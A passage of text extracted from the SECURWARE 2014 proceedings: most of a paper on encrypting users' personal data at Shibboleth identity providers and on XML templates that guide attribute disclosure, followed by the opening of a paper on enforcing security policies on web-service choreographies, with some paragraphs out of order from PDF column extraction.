Users have the right to be skeptic about the privacy and
security aspects of that model. Hence, there have been recent
cases of data breaches and leaks as noticed in [4] [5] [6],
which resulted in identity data leaks. Therefore, as pointed
by Betgé-Brezetz, Kamga, Dupont and Guesmi in [7] cloud
service providers should focus on protecting sensitive data than
on tight security perimeters, hence, the biggest threat may be
internal.
Sánchez, Almenares, Arias, Dı́az-Sánchez and Marı́n in
[8] and De Capitani di Vimercati, Foresti and Samarati in [9]
discussed that as soon as users’ data is on identity providers
(IdP) the control on how that data is disclosed, stored and used
is lost. Moreover, data stored in the cloud may be sensitive and
if linked with its owner identity may violate his/her privacy.
This paper addresses some security and privacy aspects of
identity providers. In one side, we tackle the lack of control
that users have over their identification data (PII) that is stored
on identity providers. On the other side, it is proposed an
enhancement in the dissemination process to support users with
Copyright (c) IARIA, 2014.
ISBN: 978-1-61208-376-6
their PII data disclosure, in a way that it is lowered the risks
of unaware/unintentional data dissemination.
The rest of this paper is structured as follows. Section II
gives a brief overview of the concepts that are going to be
used throughout this paper. Section III presents and discusses
related works. Section IV describes the issue that is going to
be addressed and presents our proposals. Section V closes the
paper with the conclusions and future works.
II. Background
In order to provide a better understanding of the issue
that is being addressed and the proposed model, this section
presents a brief overview on each concept that will be used
throughout the rest of this paper.
A. Privacy
Landwehr and et al. in [10] defines privacy as the control of
release of personal data that users have. Furthermore, privacy is
a fundamental human right as pointed out by United Nations
(UN) in its universal declaration of humans rights [11]. In
addition, the Human Rights Council reinforced that the same
right that people have off-line must also be protected on-line
[12].
Therefore, privacy is a vital characteristic that has to be
considered into every system. Identity provider systems should
not be an exception and have privacy added into its design.
In addition, Diaz and Gürses presented in [13] three
different paradigms of privacy:
•
•
Privacy as a control – privacy violations are often associated with disclosure of data to third parties. In this
context, privacy technologies provide individuals with
means to control the disclosure of their information
and organizations with means to define and enforce
data security policies to prevent abuse of personal
information for unauthorized purposes. Thus, the main
goal of this paradigm is to provide users with control
and oversight over collection, processing and use of
their data;
Privacy as confidentiality – the previous paradigm
relies on the assumption that organizations that collect
and process users’ data are completely honest. However, once data is under the control of an organization,
it is hard for individuals to verify how their data is
being used. This paradigm aims to prevent information
disclosure, focusing on minimizing the information
82
SECURWARE 2014 : The Eighth International Conference on Emerging Security Information, Systems and Technologies
•
disclosed in a way that cannot be linked to users
identity;
Privacy as practice – this paradigm views privacy in
a social dimension, as users make privacy decisions
often based on how their social groups make those
decisions. In this context, technologies strive to make
information flow more transparent through feedback
and awareness, enabling a better individual and collective understanding on how information is collected,
analyzed and used.
Moreover, there are plenty of legislations that aim to protect
users’ privacy in the Internet and communication systems. In
Europe, there is the Data Protection Directive [14], in USA,
we have the Health Insurance Portability and Accountability
Act (HIPAA) [15], the Gramm-Leach-Bliley Act [16], the
Children’s Online Privacy Protection Rule [17] and in Brazil,
it was recently approved the Internet Bill of Rights[18]. All
of those aforementioned acts aim to protected users against
unwilling data disclosure and processing.
Shibboleth [23] is one of the tools that can be used to create
a federation; it uses Security Assertion Markup Language
(SAML) to exchange data between IdPs and SPs. In one hand,
it has an IdP module that is developed in Java and can cope
with distinct data repositories, such as databases, Lightweight
Directory Access Protocol (LDAP) and Central Authentication
Service (CAS). On the other hand, its SP module is developed
in C as a module for the Apache Web Server and it is used to
manage the access control of a protected resource.
Shibboleth [23] has a plug-in called uApprove.jp, which
is presented in [22] that provides users with some means to
manage PII disclosure and some feedback about the reasons
of the data collection. Figure 1 presents the Shibboleth’s with
its plug-in uApprove.jp work flow. Each step is described as
follows:
B. Identity management
Identity management can be defined as the process of
managing users’ identity attributes [19]. Moreover, Hansen,
Schwartz and Cooper in [20] stated that identity management
systems are programs or frameworks that administer the collection, authentication, and use of identity and information linked
to identity. Thus, it provides means to create, manage and use
identities’ attributes.
Bertino and Takahashi in [21] presented the roles that exist
in an identity management system:
•
•
•
•
Users – entities that want to access some kind of
service or resource;
Identity – set of attributes that can be used to represent a user, it is also called personally identifiable
information (PII);
Identity provider (IdP) – provide means to manage
users’ attributes. It delivers users’ PIIs to service
providers;
Service provider (SP) – delivers the resource/service
desired by a user. It delegates the process of authentication to IdPs and usually is responsible for the
authorization process.
Therefore, identity management systems are the frameworks, which enable users to properly manage their PIIs.
Thus, they enable users to access resources and services using
identification data that is stored in identity providers, from
which a subset of the identification attributes may be disclosed
to service providers.
In this context we also have the concept of federation,
which is define by Chadwick in [19] as an association of service providers and identity providers. Furthermore, Orawiwattanakul, Yamaji, Nakamura, Kataoka and Sonehara in [22] said
that a federation allows users to access resources in multiple
administrative domains (ADs) by initially authenticating with
their home AD instead of authenticating with the accessed one.
Therefore, identity federation is a set of standards and
technologies that enable the exchange of identities in a secure
way between different administrative domains.
Copyright (c) IARIA, 2014.
ISBN: 978-1-61208-376-6
Figure 1. Shibboleth + uApprove.jp workflow
1)
2)
3)
4)
5)
6)
7)
Unauthenticated users by means of a browser access
a protected resource;
The service provider sends users to the discovery
service (DS) in which they have to choose an IdP
that has their attributes;
Users submit to DS the IdP they are enrolled. The DS
starts the session initiators at the protected resource
and sends users to the selected IdP;
IdP answers the request and presents users with a login page in which they have to enter their credentials;
Users present their credentials that are checked upon
the IdP database. If the authentication process ends
with success, the IdP presents users with SP’s terms
of usage (ToU), which users should read and accept;
After the ToU acceptance, users are presented with
an attribute release page of uApprove.jp, which will
display user’s attributes from which the user can select/unselect the optional ones, accordingly to she/he
will.
The IdP creates an assertion with the result of the
authentication and user’s attributes that were chosen
83
SECURWARE 2014 : The Eighth International Conference on Emerging Security Information, Systems and Technologies
8)
by the user to be disclosed, which is sent to the SP
through the users’ browser;
With the authentication confirmation and some PII
data the SP can deliberate about the resource delivery.
There are other tools that can be used to create federations
such as OpenAM and OpenId Connect. This paper uses Shibboleth for its widespread adoption in the academia and because
it is developed and maintained by the Internet 2 foundation as
a free open source framework to build federations.
III. Related work
Switch in [24] developed a plugin to Shibboleth IdPs that
provides awareness of data disclosure when accessing some
resource/service. However, users cannot select which data is
going to be disclosed, the user has either to agree or disagree
with the PII dissemination.
Orawiwattanakul, Yamaji, Nakamura, Kataoka and Sonehara in [22] tackled the lack of control on PII disclosure
in cloud federations. It proposed an extension of [24] that
would enable users to select among all non-mandatory attributes which ones they wish to disclose to the SP that is
being accessed. This way, it guarantees that data disclosure is
happening with user consent.
In a different approach to deal with privacy in cloud,
Sánchez, Almenares, Arias, Dı́az-Sánchez and Marı́n in [8]
proposed a reputation protocol that weights the reputation of
entities in a federation in order to support data disclosure. This
way, users can check SPs reputations among the federation
before they send any data to it. It is also provided a way in
which users would have the ability to check what is being done
with their data, and based on that they could lower or increase
the provider reputation.
Betgé-Brezetz, Kamga, Guy-Bertrand, Mahmoud and
Dupont in [25] addressed the cloud privacy and security issues
in which users send data to cloud providers without any
guarantee that it is going to be secured in a proper way. As
Sánchez, Almenares, Arias, Dı́az-Sánchez and Marı́n did in
[8], it was proposed a o define if a user trusts or not a cloud
provider and the level of trust. Based on how much the user
trusts the cloud provider, he/she could send data in plain text,
partially encrypted (encrypted with some metadata in plain
text) or fully encrypted to the cloud. It was also proposed a
package called PDE (Privacy Data Envelope) to carry users’
data to the cloud. That package could hold the data (encrypted
or not) with some policies that state how, where, by whom and
when that data can be used.
Works [8] and [25] suffer from the same problem, a SP
with a good reputation does not mean that it is not vulnerable
to attacks, and that it is taking all the required measures to
guarantee users privacy.
As an alternative to previous presented works, Chadwick
and Fatema in [26] addressed the lack of means to create
access policies for data stored in the cloud and the absence of
standards to apply such policies defined not just by users, but
also, by countries where data is stored. It was proposed a series
of web services that would analyze policies that are uploaded
within the data before any action is executed. Therefore, once
an application receives a request to process some data, it should
consult the proposed web services if it can proceed with the
requested action.
Copyright (c) IARIA, 2014.
ISBN: 978-1-61208-376-6
TABLE I. PROPERTIES OF WORKS
Publications
Reference
Year
[24]
[22]
[8]
[25]
[26]
[7]
Our proposal
–
2010
2012
2012
2012
2013
2014
Characteristics
Use of
Based on Use of Awareness of Disclosure
cryptography reputation Policies data disclosure support
X
X
X
X
X
X
X
X
X
X
X
X
X
X
Betgé-Brezetz, Kamga, Dupont and Guesmi in [7] combined the approached of reputation presented in [25] with
policies presented in [26]. Its proposal addresses privacy issues
of cloud computing in an end-to-end fashion way. It used stick
policies with the PDE proposed in [25] to carry all together
policies and data to the cloud. The proposal consists in adding
on cloud service providers points that evaluate those policies
before using the data, these points are called data protection
module (DPM), which would guarantee the evaluation of
defined policies before any process is made with the data. It
is also defined that the PDE containing the policies and data
would just be sent (processed, copied and stored) into cloud
nodes that have the DPMs modules deployed.
Works [7] and [26] experience the same problem, that is the
lack of guarantee that a provider is truly obeying the proposed
models. Users do not have means to check if the protection
modules were developed, deployed and are working properly.
Having presented the related works, we can categorize the
papers that were presented into the following properties:
•
•
•
•
•
Use of cryptography – use of cryptography to store
data at a provider;
Based on reputation – use of reputation to back up
users’ decision of which data and how it is sent to
SPs;
Use of Policies – policies that regulate how data is
used/disclosed at a provider;
Awareness of data disclosure – provide feedback to
make users aware of data dissemination;
Disclosure support – provide means to support users
when they are disseminating data from an IdP to a SP.
Table I matches the properties shown above with the ones
found in presented related works. Therefore, it can be noticed
that our proposal combines the properties found in related
works, striving to enhance the support and privacy in identity
providers.
IV. Enhancing privacy on identity providers
This section discusses and presents the issues that are being
addressed. Thus, it introduces our proposals to tackle those
problems.
A. Privacy issues
There are legislations [14] [15] [16] [17] [18] and guidelines create by Jansen and et al. [27] and Security Alliance in
[28] to address privacy issues that arise in information systems.
Those laws and standards aim to guarantee users rights over
their data. Furthermore, works [7] [8] [22] [24] [25] [26] tried
84
SECURWARE 2014 : The Eighth International Conference on Emerging Security Information, Systems and Technologies
to address some of the issues that exist when data is stored out
of users boundaries. However, there are still a lack of models
and mechanisms:
•
•
Lack of control over user’s PII – users do not have
effective means to manage their data that is stored in
identity providers;
Disclosure support – as presented in a research by
Zhang and et al. in [29] people could not successfully
define their personal information disclosure policies.
Therefore, there should be created a way to support
users when they are disseminating PII information.
The lack of control that users have over their sensitive data
gets worse once they migrate to cloud services. As presented
by Mather, Kumaraswamy and Latif in [30], once organizations
have migrated to the cloud they lose control over their structure
used to host services. Moreover, Zhang and et al. discussed in
[31] that loss of control can lead to data leaks as a consequence
of curious/malicious system administrators of the underlying
structures.
B. Working with privacy in identity providers
Our proposal uses the concepts of privacy described by
Diaz and Gürses [13], striving to minimize data disclosure and
provide means for users to effectively control personal data
disclosure. Thus, it makes the flow of data more transparent
providing users awareness of data dissemination.
In addition, users are responsible for data entered into IdPs,
which is then used to access some service provided by an
SP. Thus, users should have means to proper control data
disclosure, and that process must be improved to be more
transparent for its users.
Therefore, we extended the federation framework presented
earlier. In one hand, we added templates for data dissemination
to support users with the PII disclosure. On the other hand, we
used the cryptography approach to store PII data encrypted in
IdPs.
Our model is presented in Figure 2, users would enter their
PII data into IdP providers encrypted with some key, therefore,
the disclosure process had to be extended to allow users to
open the data they wish to disseminate. We propose that layer
of protection over the PII data, in order to make it harder to
access and disseminate that data without users’ awareness and
consent.
We also created a way in which users can send their
preferences for data dissemination to IdPs in order to ease
and secure the disclosure process. As pictured in Figure 2,
those preferences would be created as policies written in XML,
they would be drawn by entities such as security labs, privacy
commissioners and security experts of the area who hold the
knowledge of which data can cause more or less harm to users’
privacy if disclosed.
The process of data dissemination from IdPs to SPs was
extended to cope with our proposal of templates for data dissemination. The dissemination process has to use the proposed
templates to support users with data disclosure.
Therefore, our proposal adds new objects into the model
of identity management of the Shibboleth framework. Each
object and its role is described as follows:
Copyright (c) IARIA, 2014.
ISBN: 978-1-61208-376-6
Figure 2. Enhancing privacy on identity providers.
•
•
Template data dissemination (TDD) – it is the template
which users can get from entities that the user trust,
customize if needed (as Bob does in Figure 2) and enter it into IdPs to help them manage their PIIs release.
It guides users throughout the disclosure process with
different granular configuration to different SPs;
Cryptography Keys – are the keys used to encrypt and
decrypt users PII that is store in the IdP. Users would
encrypt their PIIs before sending them to IdPs with
Key I, and during a transaction when some PII data
is needed users would be asked to open that data with
key II in order to disseminate it to a SP.
The following subsections present the extensions that we
developed in order to make Shibboleth IdP and its uApprove.jp
plugin cope with our proposals. We divided the work into
addressing the loss of control on users PIIs and adding support
to users at the disclosure process.
1) Addressing the loss of control on users PIIs: Papers
[7] [31] [26] suggested that there could be curious/malicious
internal entities into providers (SP and IdP) with privileges and
technical means to harm users privacy. Therefore, we propose
to store users’ PIIs into IdPs encrypted in a way that just the
user can decrypt the data and use it.
We did not propose any way to deal with this situation at
the SP side at this moment. In one hand, because as argued
by Chadwick in [19] if the fair principles of data collection
and minimization are followed the SP will just receive a
pseudonym and some data that by themselves do not give any
hint about the user’s identity. On the other hand, because the
IdP concentrate all the sensitive information needed to link
a system user to a person. Furthermore, as presented by De
Capitani di Vimercati, Foresti and Samarati in [9], data per
se is not sensitive, what is sensitive is its association with an
identity.
We developed a tag library using Java Web technologies to
be used as a basic framework to create forms in which users
would enter their PII data as they usually do when creating an
account in some IdP system as shown in Figure 3. However,
the data that is sent to the IdP will be encrypted with some
key, just the password and the login would not be encrypted,
as they are needed to execute the authentication process.
85
SECURWARE 2014 : The Eighth International Conference on Emerging Security Information, Systems and Technologies
(a) User’s public key.
(a) User’s private key.
(b) Key derivation from passphrase.
(b) Key derivation from passphrase.
Figure 3. Privacy enhanced sign up forms for IdP.
Figure 4. User decrypting data to send to SP.
The framework we developed gives the following options
to users when asking for a key:
we had to change the flow of message presented in Figure 1,
hence the IdP would not have users’ PII in clear text anymore.
It was needed an extension to enable users to decrypt the data
that is going to be sent to SPs as pictured in Figure 4.
If the user selected to send data encrypted with a passphrase or a public key, there will be some difference when we
decrypt the PII needed to send to the SP.
In one side, if users selected to encrypt data with a public
key, when the decryption is required we ask them for a private
key as depicted in Figure 4(a). On the other side, if they chose
to encrypt data with a key derived from a pass-phrase, we then
ask for the pass-phrase to derive the keys, from which we use
the second key generated to decrypt the data as pictured in
Figure 4(b).
2) Adding support to users at the disclosure process:
Birrell and Schneider discussed in [35] that the control of
PII dissemination can be inconvenient forcing users to decide which data can be sent to which SP every time they
access a new service. Furthermore, Zhang and et al. in [29]
•
•
Use a public key – the user can choose to enter a
public key that she/he already has as the key to encrypt
the PII data, as shown in Figure 3(a);
Use a pass-phrase – users can enter a pass-phrase that
is used to derive a pair of keys from which we take
the first one and encrypted their data before sending
them to the IdP, as depicted in Figure 3(b).
Both of the aforementioned approaches are performed at
the client side, the user’s keys are never sent to the IdP
server. Thus, to encrypt the data at the client site we used the
web programming language Javascript with libraries Cryptico
[32] and pidCrypt [33] respectively when users desire to use
a passphrase or a public key to encrypt her/his data. Thus,
both libraries are based on the Javascript cryptography library
developed by Wu [34].
Our proposal inserts data into the IdP encrypted. Thereby,
Copyright (c) IARIA, 2014.
ISBN: 978-1-61208-376-6
86
SECURWARE 2014 : The Eighth International Conference on Emerging Security Information, Systems and Technologies
demonstrated that users usually fail to successfully define their
data disclosure policies. Thus, Hansen, Schwartz and Cooper
in [20] argued that one single default setting would not suit
properly every user needs. Therefore, we proposed the use of
TDDs based on different user types, this way, we could have
different TDDs, enabling users to customize data disclosure in
a granular way. The TDDs developed in XML look like the
document presented in Figure 5.
<?xmlversion="1.0"encoding="UTF?8"?>
<templateDataDissemination
xmlns="http://privacy.lrg.ufsc.br/tdd"
xmlns:xsi=
"http://www.w3.org/2001/XMLSchema?instance" xsi:schemaLocation="
http://privacy.lrg.ufsc.br/tdd
http://privacy.lrg.ufsc.br/tdd-1.0.xsd">
<spDomain>sp.domain.com</spDomain>
<spAttributesBehaviours>
<attributeBehaviour>
<attributeName>name</attributeName>
<selectedByDefault>true</selectedByDefault>
</attributeBehaviour>
<attributeBehaviour>
<attributeName>lastName</attributeName>
<selectedByDefault>true</selectedByDefault>
</attributeBehaviour>
<attributeBehaviour>
<attributeName>email</attributeName>
<selectedByDefault>false</selectedByDefault>
</attributeBehaviour>
<attributeBehaviour>
<attributeName>SSN</attributeName>
<selectedByDefault>false</selectedByDefault>
</attributeBehaviour>
<attributeBehaviour>
<!-- Any other we use false -->
<attributeName>*</attributeName>
<selectedByDefault>false</selectedByDefault>
</attributeBehaviour>
</spAttributesBehaviours>
</templateDataDissemination>
In addition, this paper focused on tackling some privacy
issues in identity providers, there are still issues to be dealt
with at the service provider side, such as means to control
attributes that were released from an IdP to a SP. Our proposal
of personas to manage the granular release of users PIIs has
the goal to lower the risks that arise with the dissemination of
certain combination of attributes. It does not protect privacy
by itself; users are still vulnerable to malicious SPs that may
collude to profile a user identity in a federated environment.
Therefore, as a future works we intend to investigate means
to enforce users privacy in service providers.
As a next step to be taken in our research we will extend
the OpenId Connect federation protocol, in order to add our
proposals. The OpenId Connect protocol uses JSON instead of
SAML (XML), which makes it easier to use in mobile environments in which XML processing can become a problem. We
also intend to investigate the possibility to use web semantic
into our proposals, to ease the adaptation of systems already
developed and to decouple identity management models and
protocols from the technology aspect.
Acknowledgment
The research is funded by the Brazilian Funding Authority
for Studies and Projects (FINEP) under the Brazilian National
Research Network in Security and Cryptography project (RENASIC) and conducted at the virtual laboratory of secure
implementations (LATIM) at the Federal University of Santa
Catarina (UFSC) in the Networks and Management laboratory
(LRG).
References
[1]
[2]
Figure 5. Example of TDD
Thereby, we extended the Shibboleth IdP to use the TDDs
shown above. This way, when users reach the process of PII
disclosure, they will be presented with a page in which the
attributes to be disclosed will already be selected/deselected.
[3]
V. Conclusion
While papers [8] [25] and [7] [26] tried to manage privacy
in the cloud respectively by assessing cloud service providers
reputation and creating sticky policies within data, our proposal
tackles the lack of control of users’ PIIs into IdPs and the
lack of support when disclosing PIIs to SPs, respectively
by encrypting PIIs into IdPs and using templates for data
dissemination to support users when disclosing data.
Our proposal avoids curious and malicious system administrators to gather users’ PII data without permission in IdPs. If
an administrator accesses the data repository she/he will not be
able to retrieve any relevant data about a user identity, hence,
that sensitive information will be encrypted.
Furthermore, our proposal is a lightweight extension on
top of Shibboleth identity provider and its uApprove.jp plugin,
which works transparently to SPs, thence, all of the extensions
were developed at the IdP. Moreover, once the proposal is
deployed it can prevent PII data leaks that cause identity theft
and the correlation of big data processing with a specific user’s
identity without her/his consent.
[5]
Copyright (c) IARIA, 2014.
ISBN: 978-1-61208-376-6
[4]
[6]
[7]
[8]
[9]
[10]
P. Hall, “Opportunities for csps in enterprise-grade public cloud computing,” OVUM, May, 2012.
C.
I.
Forum,
“Uk
cloud
adoption
and
trends
for
2013,”
Tech.
Rep.,
2013.
[Online]. Available: http://cloudindustryforum.org/downloads/whitepapers/
cif-white-paper-8-2012-uk-cloud-adoption-and-2013-trends.pdf
S. Srinivasamurthy and D. Liu, “Survey on cloud computing security,”
in Proc. Conf. on Cloud Computing, CloudCom, vol. 10, 2010.
M. Helft, “After breach, companies warn of e-mail fraud,” The New
York Times, Abril 2011, retrieved: February, 2014. [Online]. Available:
http://www.nytimes.com/2011/04/05/business/05hack.html
D. Kocieniewski, “Adobe announces security breach,” The
New York Times, Outubro 2013, retrieved: February, 2014.
[Online]. Available: http://www.nytimes.com/2013/10/04/technology/
adobe-announces-security-breach.html
C. Sang-Hun, “Theft of data fuels worries in south korea,” The
New York Times, Janeiro 2014, retrieved: February, 2014. [Online].
Available: http://www.nytimes.com/2014/01/21/business/international/
theft-of-data-fuels-worries-in-south-korea.html
S. Betgé-Brezetz, G.-B. Kamga, M.-P. Dupont, and A. Guesmi, “Endto-end privacy policy enforcement in cloud infrastructure,” in Cloud
Networking (CloudNet), 2013 IEEE 2nd International Conference on.
IEEE, 2013, pp. 25–32.
R. Sánchez, F. Almenares, P. Arias, D. Dı́az-Sánchez, and A. Marı́n,
“Enhancing privacy and dynamic federation in idm for consumer cloud
computing,” Consumer Electronics, IEEE Transactions on, vol. 58,
no. 1, 2012, pp. 95–103.
S. De Capitani di Vimercati, S. Foresti, and P. Samarati, “Managing
and accessing data in the cloud: Privacy risks and approaches,” in Risk
and Security of Internet and Systems (CRiSIS), 2012 7th International
Conference on. IEEE, 2012, pp. 1–9.
C. Landwehr, D. Boneh, J. C. Mitchell, S. M. Bellovin, S. Landau,
and M. E. Lesk, “Privacy and cybersecurity: The next 100 years,”
Proceedings of the IEEE, vol. 100, no. Special Centennial Issue, 2012,
pp. 1659–1673.
87
SECURWARE 2014 : The Eighth International Conference on Emerging Security Information, Systems and Technologies
[11]
[12]
[13]
[14]
[15]
[16]
[17]
[18]
[19]
[20]
[21]
[22]
[23]
[24]
[25]
[26]
[27]
[28]
[29]
[30]
[31]
[32]
H. Lauterpacht, “Universal declaration of human rights, the,” Brit. YB
Int’l L., vol. 25, 1948, p. 354.
H. R. Council, “The promotion, protection and enjoyment of human
rights on the internet (a/hrc/20/l.13),” 2012, retrieved: February, 2014.
[Online]. Available: http://ap.ohchr.org/documents/alldocs.aspx?doc
id=20280
C. Diaz and S. Gürses, “Understanding the landscape of privacy
technologies,” Extended abstract of invited talk in proceedings of the
Information Security Summit, 2012, pp. 58–63.
E. Directive, “95/46/ec of the european parliament and of the council
of 24 october 1995 on the protection of individuals with regard
to the processing of personal data and on the free movement
of such data,” Official Journal of the EC, vol. 23, no. 6, 1995,
retrieved: February, 2014. [Online]. Available: http://eur-lex.europa.eu/
LexUriServ/LexUriServ.do?uri=CELEX:31995L0046:en:HTML
U. S. Congress, “Health insurance portability and accountability act of
1996,” 1996, retrieved: February, 2014. [Online]. Available: http://www.
gpo.gov/fdsys/pkg/PLAW-104publ191/html/PLAW-104publ191.htm
U.
Congress,
“Gramm-leach-bliley
act,”
1999,
retrieved:
February, 2014. [Online]. Available: http://www.gpo.gov/fdsys/pkg/
PLAW-106publ102/html/PLAW-106publ102.htm
U. S. F. T. Commission, “Children’s online privacy protection
rule,” 2013, retrieved: February, 2014. [Online]. Available: http:
//www.gpo.gov/fdsys/pkg/FR-2013-12-20/html/2013-30293.htm
C. Civil, “Lei no 12.965, de 23 abril de 2014,” 2014, retrieved:
July, 2014. [Online]. Available: http://www.planalto.gov.br/ccivil 03/
ato2011-2014/2014/lei/l12965.htm
D. W. Chadwick, “Federated identity management,” in Foundations of
Security Analysis and Design V. Springer, 2009, pp. 96–120.
M. Hansen, A. Schwartz, and A. Cooper, “Privacy and identity management,” Security & Privacy, IEEE, vol. 6, no. 2, 2008, pp. 38–45.
E. Bertino and K. Takahashi, Identity Management: Concepts, Technologies, and Systems. Artech House, 2011.
T. Orawiwattanakul, K. Yamaji, M. Nakamura, T. Kataoka, and N. Sonehara, “User-controlled privacy protection with attribute-filter mechanism
for a federated sso environment using shibboleth,” in P2P, Parallel,
Grid, Cloud and Internet Computing (3PGCIC), 2010 International
Conference on. IEEE, 2010, pp. 243–249.
Shibboleth, “What’s shibboleth?” retrieved: July, 2014. [Online].
Available: https://shibboleth.net/about/
SWITCH, “uapprove - user consent module for shibboleth identity
providers,” retrieved: June, 2014. [Online]. Available: https://www.
switch.ch/aai/support/tools/uApprove.html
S. Betgé-Brezetz, G.-B. Kamga, M. Ghorbel, and M.-P. Dupont, “Privacy control in the cloud based on multilevel policy enforcement,”
in Cloud Networking (CLOUDNET), 2012 IEEE 1st International
Conference on. IEEE, 2012, pp. 167–169.
D. W. Chadwick and K. Fatema, “A privacy preserving authorisation
system for the cloud,” Journal of Computer and System Sciences,
vol. 78, no. 5, 2012, pp. 1359–1373.
W. Jansen, T. Grance et al., “Guidelines on security and privacy in
public cloud computing,” NIST special publication, vol. 800, 2011, p.
144.
C. Alliance, “Security guidance for critical areas of focus in cloud
computing v3. 0,” Cloud Security Alliance, 2011.
Q. Zhang, Y. Qi, J. Zhao, D. Hou, T. Zhao, and L. Liu, “A study on
context-aware privacy protection for personal information,” in Computer
Communications and Networks, 2007. ICCCN 2007. Proceedings of
16th International Conference on. IEEE, 2007, pp. 1351–1358.
T. Mather, S. Kumaraswamy, and S. Latif, Cloud security and privacy:
an enterprise perspective on risks and compliance. ” O’Reilly Media,
Inc.”, 2009.
W. Han-zhang and H. Liu-sheng, “An improved trusted cloud computing
platform model based on daa and privacy ca scheme,” in Computer
Application and System Modeling (ICCASM), 2010 International Conference on, vol. 13, Oct 2010, pp. V13–33–V13–39.
R. Terrell, “An easy-to-use encryption system utilizing rsa and
aes for javascript.” 2012, retrieved: May, 2014. [Online]. Available:
https://github.com/wwwtyro/cryptico
Copyright (c) IARIA, 2014.
ISBN: 978-1-61208-376-6
[33]
Pidder, “pidcrypt – a javascript crypto library.” retrieved: May, 2014.
[Online]. Available: https://www.pidder.de/pidcrypt/
[34] T. Wu, “Rsa and ecc in javascript.” 2009, retrieved: May, 2014.
[Online]. Available: http://www-cs-students.stanford.edu/∼tjw/jsbn/
[35] E. Birrell and F. B. Schneider, “Federated identity management systems:
A privacy-based characterization,” IEEE security & privacy, vol. 11,
no. 5, 2013, pp. 36–48.
88
SECURWARE 2014 : The Eighth International Conference on Emerging Security Information, Systems and Technologies
Enforcing Security Policies on Choreographed Services using Rewriting Techniques
Karim Dahmani
Mahjoub Langar
karim.dahmani@fst.rnu.tn
mahjoub.langar@ift.ulaval.ca
LIP2 Research Laboratory
Faculté des Sciences de Tunis
Tunis, Tunisia
Abstract—This paper presents an automated formal approach
for enforcing security policies on a choreography of Web
Services. We take as input a formal description of a
choreography of web services and a security property
represented by a process, then we define some rewriting rules
and rewrite the two processes in order to make them
synchronize on each communication action. This approach
produces as output a secure version of the concerned web
service which behaves like the original one but does not violate
the security property.
Keywords-Web
Service
Composition
Security;
Instrumentation; Choreography; Formal Verification; EndPoint Calculus.
I.
INTRODUCTION
Web Services (WS) are distributed and modular
applications that communicate by message passing in order
to complete specific activities. Composition of WS consists
in combining different WS to provide value-added services.
WS composition rules deal with how different services are
composed into a coherent global service. In particular, they
specify the order in which services are invoked, and the
conditions under which a certain service may or may not be
invoked. Among the approaches investigated in service
composition, we distinguish orchestration and choreography.
The orchestration composes available services and adds a
central coordinator (the orchestrater) which is responsible for
invoking and composing the single sub-activities. However
the second one, referred to as WS choreography, does not
assume the exploitation of a central coordinator but rather
defines complex tasks via the definition of the conversation
that should be undertaken by each participant. Several
proposals exist for orchestration and choreography languages
such as Business Process Execution Language (BPEL) [1]
for orchestration and Web Service Choreography
Description Language (WS-CDL) [2] for choreography.
Since the orchestration technique uses a central coordinator
that composes the available services, it seems trivial to
enforce security policies. So the technique that will be used
in this paper for composing WS is the choreography. One of
the main challenges for researchers in this domain is the
formalization of these composition languages. Although,
several contributions have been developed in the last decade
that formalize WS-CDL such as the Global Calculus (GC)
and the End-Point Calculus (EPC) proposed by Carbone et
al. [3], the Choreography Language proposed by N. Busi et
al. [4], The Choreography Description Language proposed
Copyright (c) IARIA, 2014.
ISBN: 978-1-61208-376-6
by H. Yang et al. [12] and timed automata proposed by G.
Diaz et al. [5]. The formal specification language used in this
paper is the End-Point Calculus that has been introduced by
Carbone et al. [3]. One of the reasons behind this choice is
that the end-point calculus is a modified version of the picalculus, so its syntax is more familiar and its expressivity is
stronger.
The need of secure WS composition has led to a great
interest from researchers in the last decade. In this paper, we
propose an automated formal approach for the enforcement
of security policies on choreographed services. We take as
input a formal description of the behavior of a participant in
a choreography and a security property. We define rewriting
rules for adding some special actions to processes and
security properties in order to ensure synchronization and
consequently control the evolution of the behavior of a
participant.
This paper is structured as follows: in Section II, we
introduce the choreography specification language used in
this topic. In Section III we present the security property
specification language. Section IV deals with the
enforcement approach. The proof of this approach is given in
Section V. Related work is in Section VI and conclusion and
future work are in Section VII.
II.
CHOREOGRAPHY SPECIFICATION LANGUAGE
Carbone et al. [3] have proposed a formal language for
specifying a choreography of WS. This language is the GC.
It describes behaviors of WS from a global viewpoint. GC is
distilled from WS-CDL. Carbone et al. [3] have also
proposed a second formal language: the EPC, which
specifies behaviors of WS from a local viewpoint. Finally, a
projection under some assumptions from GC to EPC have
been proposed by Carbone et al. [3], which is called the EndPoint Projection (EPP). The language adapted in this paper
for formally specifying processes and security properties is
EPC.
A. Syntax of the End-Point Calculus
EPC describes the behavior of each participant in the
choreography from its end-point view. EPC is a variant of
the pi-calculus augmented with the notion of participants
and their local states. We present hereafter the syntax and
formal semantics of EPC where P,Q range over processes,
ch range over service channels, s range over session
channels, opi range over operator names, x range over
89
SECURWARE 2014 : The Eighth International Conference on Emerging Security Information, Systems and Technologies
variables, e range over expressions and X range over term
variables.
P ::=! ch ( ̃s ). P ∣ ch (ν ̃s ). P ∣ s▹Σi op i ( x i ). P i
∣ s◃op(e) . P ∣ x :=e.P ∣ P ⊕Q ∣ P∣Q
∣ if e then P else Q ∣( ν s) P
∣ rec X.P ∣ 0
•
! ch ( ̃s ). P and ch (ν ̃s ). P represent session
is used for input and
initiation.
! ch ( ̃s ). P
ch (ν ̃s ). P for output. ! ch ( ̃s ). P says that
the service channel ch, which is available to public,
is ready to receive an unbounded number of
invocations, offering a communication via its
freshly generated session channels
s∈ s.̃
ch (ν s̃ ). P is an invocation of a service located
at the service channel ch and an initiation of a
communication session that will occur through
session channels s∈ s.̃ After a session has been
initiated between two participants and freshly
generated session channels have been shared
between them, they can communicate via these
channels using the communication constructs.
•
s▹Σi op i ( x i ). P i is an offer of one of operators
op i and a reception of an expression e through
the session channel s that will be evaluated and
stored in the local variable x. A participant having
this behavior will receive an invocation of one of
its operator names op i and an expression e. The
value of e is saved in its local variable x.
For instance, a seller service receives a
confirmation or a cancellation for a purchase :
s▹confirmPurchase ( x1 ). P
+s▹ cancelPurchase( x 2 ).0
•
s◃op(e) . P sends the expression e and invokes
operator op through the session channel s. Indeed,
a buyer service requests a quote of a chosen
product from a seller through the channel s:
s◃quoteRequest (e product ). P
are
In addition, operator names
op 1, op 2, ...
invoked by a message sender or offered by a
message receiver. Operator names in in-session
communications are analogous to methods in
objects [3].
•
x :=e.P is the assignment operator. It is a local
operation. It assigns the result of the evaluation of
the expression e to the variable x. For example, the
buyer assigns to its variable x the value of the
